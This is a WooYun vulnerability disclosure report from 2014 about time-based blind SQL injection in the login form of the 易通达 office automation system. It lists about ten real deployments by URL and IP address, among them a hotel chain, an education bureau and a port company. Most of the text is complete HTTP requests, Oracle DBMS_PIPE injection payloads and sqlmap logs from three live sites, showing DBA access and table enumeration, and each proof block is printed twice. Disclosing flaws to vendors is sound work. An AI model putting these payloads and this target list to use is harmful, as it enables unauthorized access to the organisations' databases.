乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-10-15: 细节已通知厂商并且等待厂商处理中 2014-10-20: 厂商已经确认,细节仅向厂商公开 2014-10-23: 细节向第三方安全合作伙伴开放 2014-12-14: 细节向核心白帽子及相关领域专家公开 2014-12-24: 细节向普通白帽子公开 2015-01-03: 细节向实习白帽子公开 2015-01-13: 细节向公众公开
快告诉我,挖掘机技术哪家强?
产品名:易通达综合办公系统官网介绍:http://oa.fj.bnet.cn/oa/homepage/index_prod_intro.jsp 有近4000客户 客户案例:http://oa.fj.bnet.cn/oa/homepage/index_prod_sample.jsp
客户案例:http://oa.fj.bnet.cn/oa/homepage/index_prod_sample.jsp
登入界面存在AND/OR time-based blind,官网上写有近4000家客户,google,baidu下,关键字:易通达综合办公系统找到这些: http://oa.fj.bnet.cn/oa/homepage/index.jsp http://www.ahomehotel.com:8081/oa/login.jsp A家连锁酒店http://hlbg.flylong.com.cn:8081/oa/login.jsp 汇龙集团http://61.131.50.27:8081/oa/login.jsp 南安市教育局办公平台http://oa.doone.com.cn/oa/login.jsphttp://220.161.217.98:8082/oa/login.jsphttp://222.77.67.205:8080/oa/login.jsp 海西信息化合作联盟http://222.77.63.70:8081/oa/login.jsp 喜多多集团有限公司http://218.66.159.28:8081/oa/login.jsp 泉州港务集团后渚分公司http://202.101.116.81/oa/login.jsp
证明1:先拿官网来测试http://oa.fj.bnet.cn/oa/homepage/index.jsp post请求:POST /oa/LoginCheck HTTP/1.1Host: oa.fj.bnet.cn:8082Proxy-Connection: keep-aliveContent-Length: 33Cache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Origin: http://oa.fj.bnet.cnUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36Content-Type: application/x-www-form-urlencodedDNT: 1Referer: http://oa.fj.bnet.cn/oa/homepage/index.jspAccept-Encoding: gzip,deflate,sdchAccept-Language: zh-CN,zh;q=0.8,en-US;q=0.6,en;q=0.4Cookie: JSESSIONID=5A75D4112E7D698290D1399010C961BE; JSESSIONID=391456841B314A4C7416D9219E15276DACCOUNT=a&STAFFID=a&PWD=a&v_code=sqlmap:sqlmap identified the following injection points with a total of 703 HTTP(s) requests:---Place: POSTParameter: ACCOUNT Type: AND/OR time-based blind Title: Oracle AND time-based blind Payload: ACCOUNT=a') AND 2988=DBMS_PIPE.RECEIVE_MESSAGE(CHR(72)||CHR(117)||CHR(119)||CHR(99),5) AND ('OvqL'='OvqL&STAFFID=a&PWD=a&v_code=Place: POSTParameter: STAFFID Type: AND/OR time-based blind Title: Oracle AND time-based blind Payload: ACCOUNT=a&STAFFID=a' AND 5773=DBMS_PIPE.RECEIVE_MESSAGE(CHR(121)||CHR(68)||CHR(72)||CHR(102),5) AND 'zwXS'='zwXS&PWD=a&v_code=---back-end DBMS: Oracleavailable databases [10]:[*] BASEDBA[*] COMPANY[*] FLOWCFG[*] INTER_SEARCH[*] LBACSYS[*] OLAPSYS[*] OUTLN[*] SYS[*] SYSTEM[*] WMSYS数据库BASEDBA的表:612张[19:40:42] [INFO] fetching tables for database: 'BASEDBA'[19:40:42] [INFO] fetching number of tables for database 'BASEDBA'[19:40:42] [INFO] resumed: 612[19:40:42] [INFO] resuming partial value: PB[19:40:42] [INFO] retrieved: _TEST[19:41:20] [INFO] retrieved: SMS_BAT
post请求:POST /oa/LoginCheck HTTP/1.1Host: oa.fj.bnet.cn:8082Proxy-Connection: keep-aliveContent-Length: 33Cache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Origin: http://oa.fj.bnet.cnUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36Content-Type: application/x-www-form-urlencodedDNT: 1Referer: http://oa.fj.bnet.cn/oa/homepage/index.jspAccept-Encoding: gzip,deflate,sdchAccept-Language: zh-CN,zh;q=0.8,en-US;q=0.6,en;q=0.4Cookie: JSESSIONID=5A75D4112E7D698290D1399010C961BE; JSESSIONID=391456841B314A4C7416D9219E15276DACCOUNT=a&STAFFID=a&PWD=a&v_code=sqlmap:sqlmap identified the following injection points with a total of 703 HTTP(s) requests:---Place: POSTParameter: ACCOUNT Type: AND/OR time-based blind Title: Oracle AND time-based blind Payload: ACCOUNT=a') AND 2988=DBMS_PIPE.RECEIVE_MESSAGE(CHR(72)||CHR(117)||CHR(119)||CHR(99),5) AND ('OvqL'='OvqL&STAFFID=a&PWD=a&v_code=Place: POSTParameter: STAFFID Type: AND/OR time-based blind Title: Oracle AND time-based blind Payload: ACCOUNT=a&STAFFID=a' AND 5773=DBMS_PIPE.RECEIVE_MESSAGE(CHR(121)||CHR(68)||CHR(72)||CHR(102),5) AND 'zwXS'='zwXS&PWD=a&v_code=---back-end DBMS: Oracleavailable databases [10]:[*] BASEDBA[*] COMPANY[*] FLOWCFG[*] INTER_SEARCH[*] LBACSYS[*] OLAPSYS[*] OUTLN[*] SYS[*] SYSTEM[*] WMSYS数据库BASEDBA的表:612张[19:40:42] [INFO] fetching tables for database: 'BASEDBA'[19:40:42] [INFO] fetching number of tables for database 'BASEDBA'[19:40:42] [INFO] resumed: 612[19:40:42] [INFO] resuming partial value: PB[19:40:42] [INFO] retrieved: _TEST[19:41:20] [INFO] retrieved: SMS_BAT
证明2:http://www.ahomehotel.com:8081/oa/login.jsp post请求POST /oa/LoginCheck HTTP/1.1Host: www.ahomehotel.com:8081Proxy-Connection: keep-aliveContent-Length: 23Cache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Origin: http://www.ahomehotel.com:8081User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36Content-Type: application/x-www-form-urlencodedDNT: 1Referer: http://www.ahomehotel.com:8081/oa/login.jspAccept-Encoding: gzip,deflate,sdchAccept-Language: zh-CN,zh;q=0.8,en-US;q=0.6,en;q=0.4Cookie: JSESSIONID=A1DBF76223853C155076CF845B3CA29E; last_login_date=2014/10/14/17; staff_code=a; password=; today_login_times=1STAFFID=a&PWD=a&v_code=sqlmap:sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: POSTParameter: STAFFID Type: AND/OR time-based blind Title: Oracle AND time-based blind Payload: STAFFID=a') AND 2145=DBMS_PIPE.RECEIVE_MESSAGE(CHR(70)||CHR(77)||CHR(97)||CHR(81),5) AND ('NOWe'='NOWe&PWD=a&v_code=---back-end DBMS: Oraclecurrent user is DBA: Truesqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: POSTParameter: STAFFID Type: AND/OR time-based blind Title: Oracle AND time-based blind Payload: STAFFID=a') AND 2145=DBMS_PIPE.RECEIVE_MESSAGE(CHR(70)||CHR(77)||CHR(97)||CHR(81),5) AND ('NOWe'='NOWe&PWD=a&v_code=---back-end DBMS: Oracleavailable databases [14]:[*] BASEDBA[*] CTXSYS[*] DBSNMP[*] FLOWCFG[*] FLOWS_020100[*] FLOWS_FILES[*] HR[*] INTER_SEARCH[*] MDSYS[*] OUTLN[*] SYS[*] SYSTEM[*] TSMSYS[*] XDB数据库BASEDBA表,有426张,这里不跑完了:[18:11:50] [INFO] the back-end DBMS is Oracleback-end DBMS: Oracle[18:11:50] [INFO] fetching tables for database: 'BASEDBA'[18:11:50] [INFO] fetching number of tables for database 'BASEDBA'[18:11:50] [INFO] resumed: 426[18:11:50] [INFO] resumed: COMMON_COUNTER_TOTAL[18:11:50] [INFO] resumed: COMPANY_ACCT[18:11:50] [INFO] resumed: COMP_PHONE[18:11:50] [INFO] resumed: COMP_TITLE[18:11:50] [INFO] resumed: PATH[18:11:50] [INFO] resumed: OFMESSAGEARCHIVE[18:11:50] [INFO] resumed: PAPER_DEF[18:11:50] [INFO] resumed: PAPER_INPUT_ITEM[18:11:50] [INFO] resumed: PAPER_QUESTION[18:11:50] [INFO] resumed: OFMUCAFFILIATION[18:11:50] [INFO] resumed: PAPER_QUESTION_RESULT[18:11:50] [INFO] resumed: PAPER_RESULT[18:11:50] [INFO] resumed: OFMUCCONVERSATIONLOG[18:11:50] [INFO] resumed: PAPER_USE_CFG[18:11:50] [INFO] resumed: OFMUCMEMBER[18:11:50] [INFO] resumed: NOTIFY_Q_READLIST[18:11:50] [INFO] resumed: OA_DOC_BACK_LOG[18:11:50] [INFO] resumed: PM_STAFF_SIGN[18:11:50] [INFO] resumed: PATH_ERR[18:11:50] [INFO] resumed: DDM_TOPIC_TREE[18:11:50] [INFO] resumed: DEPT_DOC[18:11:50] [INFO] resumed: DEPT_DOC_DIR_TREE[18:11:50] [INFO] resumed: DEPT_DOC_PRIV[18:11:50] [INFO] resumed: DEPT_DOC_READLIST[18:11:50] [INFO] resumed: DEPT_FLOW_TYPE[18:11:50] [INFO] resumed: COMMON_COUNTER_TOPIC[18:11:50] [INFO] resumed: CONFERENCE\x02[18:11:50] [INFO] resumed: CONTACT_CARD[18:11:50] [INFO] resuming partial value: CONTACT_CARD_
post请求POST /oa/LoginCheck HTTP/1.1Host: www.ahomehotel.com:8081Proxy-Connection: keep-aliveContent-Length: 23Cache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Origin: http://www.ahomehotel.com:8081User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36Content-Type: application/x-www-form-urlencodedDNT: 1Referer: http://www.ahomehotel.com:8081/oa/login.jspAccept-Encoding: gzip,deflate,sdchAccept-Language: zh-CN,zh;q=0.8,en-US;q=0.6,en;q=0.4Cookie: JSESSIONID=A1DBF76223853C155076CF845B3CA29E; last_login_date=2014/10/14/17; staff_code=a; password=; today_login_times=1STAFFID=a&PWD=a&v_code=sqlmap:sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: POSTParameter: STAFFID Type: AND/OR time-based blind Title: Oracle AND time-based blind Payload: STAFFID=a') AND 2145=DBMS_PIPE.RECEIVE_MESSAGE(CHR(70)||CHR(77)||CHR(97)||CHR(81),5) AND ('NOWe'='NOWe&PWD=a&v_code=---back-end DBMS: Oraclecurrent user is DBA: Truesqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: POSTParameter: STAFFID Type: AND/OR time-based blind Title: Oracle AND time-based blind Payload: STAFFID=a') AND 2145=DBMS_PIPE.RECEIVE_MESSAGE(CHR(70)||CHR(77)||CHR(97)||CHR(81),5) AND ('NOWe'='NOWe&PWD=a&v_code=---back-end DBMS: Oracleavailable databases [14]:[*] BASEDBA[*] CTXSYS[*] DBSNMP[*] FLOWCFG[*] FLOWS_020100[*] FLOWS_FILES[*] HR[*] INTER_SEARCH[*] MDSYS[*] OUTLN[*] SYS[*] SYSTEM[*] TSMSYS[*] XDB数据库BASEDBA表,有426张,这里不跑完了:[18:11:50] [INFO] the back-end DBMS is Oracleback-end DBMS: Oracle[18:11:50] [INFO] fetching tables for database: 'BASEDBA'[18:11:50] [INFO] fetching number of tables for database 'BASEDBA'[18:11:50] [INFO] resumed: 426[18:11:50] [INFO] resumed: COMMON_COUNTER_TOTAL[18:11:50] [INFO] resumed: COMPANY_ACCT[18:11:50] [INFO] resumed: COMP_PHONE[18:11:50] [INFO] resumed: COMP_TITLE[18:11:50] [INFO] resumed: PATH[18:11:50] [INFO] resumed: OFMESSAGEARCHIVE[18:11:50] [INFO] resumed: PAPER_DEF[18:11:50] [INFO] resumed: PAPER_INPUT_ITEM[18:11:50] [INFO] resumed: PAPER_QUESTION[18:11:50] [INFO] resumed: OFMUCAFFILIATION[18:11:50] [INFO] resumed: PAPER_QUESTION_RESULT[18:11:50] [INFO] resumed: PAPER_RESULT[18:11:50] [INFO] resumed: OFMUCCONVERSATIONLOG[18:11:50] [INFO] resumed: PAPER_USE_CFG[18:11:50] [INFO] resumed: OFMUCMEMBER[18:11:50] [INFO] resumed: NOTIFY_Q_READLIST[18:11:50] [INFO] resumed: OA_DOC_BACK_LOG[18:11:50] [INFO] resumed: PM_STAFF_SIGN[18:11:50] [INFO] resumed: PATH_ERR[18:11:50] [INFO] resumed: DDM_TOPIC_TREE[18:11:50] [INFO] resumed: DEPT_DOC[18:11:50] [INFO] resumed: DEPT_DOC_DIR_TREE[18:11:50] [INFO] resumed: DEPT_DOC_PRIV[18:11:50] [INFO] resumed: DEPT_DOC_READLIST[18:11:50] [INFO] resumed: DEPT_FLOW_TYPE[18:11:50] [INFO] resumed: COMMON_COUNTER_TOPIC[18:11:50] [INFO] resumed: CONFERENCE\x02[18:11:50] [INFO] resumed: CONTACT_CARD[18:11:50] [INFO] resuming partial value: CONTACT_CARD_
证明3:http://222.77.63.70:8081/oa/login.jsp post请求:POST /oa/LoginCheck HTTP/1.1Host: 222.77.63.70:8081Proxy-Connection: keep-aliveContent-Length: 25Cache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Origin: http://222.77.63.70:8081User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36Content-Type: application/x-www-form-urlencodedDNT: 1Referer: http://222.77.63.70:8081/oa/login.jspAccept-Encoding: gzip,deflate,sdchAccept-Language: zh-CN,zh;q=0.8,en-US;q=0.6,en;q=0.4Cookie: JSESSIONID=EF700AD15D2F63D8560AC7E162A08398; staff_code=aa; password=; last_login_date=2014/10/14/18; today_login_times=0STAFFID=aa&PWD=aa&v_code=sqlmap:sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: POSTParameter: STAFFID Type: AND/OR time-based blind Title: Oracle AND time-based blind Payload: STAFFID=aa') AND 6257=DBMS_PIPE.RECEIVE_MESSAGE(CHR(107)||CHR(78)||CHR(86)||CHR(101),5) AND ('Nijd'='Nijd&PWD=aa&v_code=---back-end DBMS: Oraclecurrent user is DBA: Trueavailable databases [14]:[*] BASEDBA[*] CTXSYS[*] DBSNMP[*] FLOWCFG[*] FLOWS_020100[*] FLOWS_FILES[*] HR[*] INTER_SEARCH[*] MDSYS[*] OUTLN[*] SYS[*] SYSTEM[*] TSMSYS[*] XDB
post请求:POST /oa/LoginCheck HTTP/1.1Host: 222.77.63.70:8081Proxy-Connection: keep-aliveContent-Length: 25Cache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Origin: http://222.77.63.70:8081User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36Content-Type: application/x-www-form-urlencodedDNT: 1Referer: http://222.77.63.70:8081/oa/login.jspAccept-Encoding: gzip,deflate,sdchAccept-Language: zh-CN,zh;q=0.8,en-US;q=0.6,en;q=0.4Cookie: JSESSIONID=EF700AD15D2F63D8560AC7E162A08398; staff_code=aa; password=; last_login_date=2014/10/14/18; today_login_times=0STAFFID=aa&PWD=aa&v_code=sqlmap:sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: POSTParameter: STAFFID Type: AND/OR time-based blind Title: Oracle AND time-based blind Payload: STAFFID=aa') AND 6257=DBMS_PIPE.RECEIVE_MESSAGE(CHR(107)||CHR(78)||CHR(86)||CHR(101),5) AND ('Nijd'='Nijd&PWD=aa&v_code=---back-end DBMS: Oraclecurrent user is DBA: Trueavailable databases [14]:[*] BASEDBA[*] CTXSYS[*] DBSNMP[*] FLOWCFG[*] FLOWS_020100[*] FLOWS_FILES[*] HR[*] INTER_SEARCH[*] MDSYS[*] OUTLN[*] SYS[*] SYSTEM[*] TSMSYS[*] XDB
找蓝翔
危害等级:高
漏洞Rank:10
确认时间:2014-10-20 10:03
暂无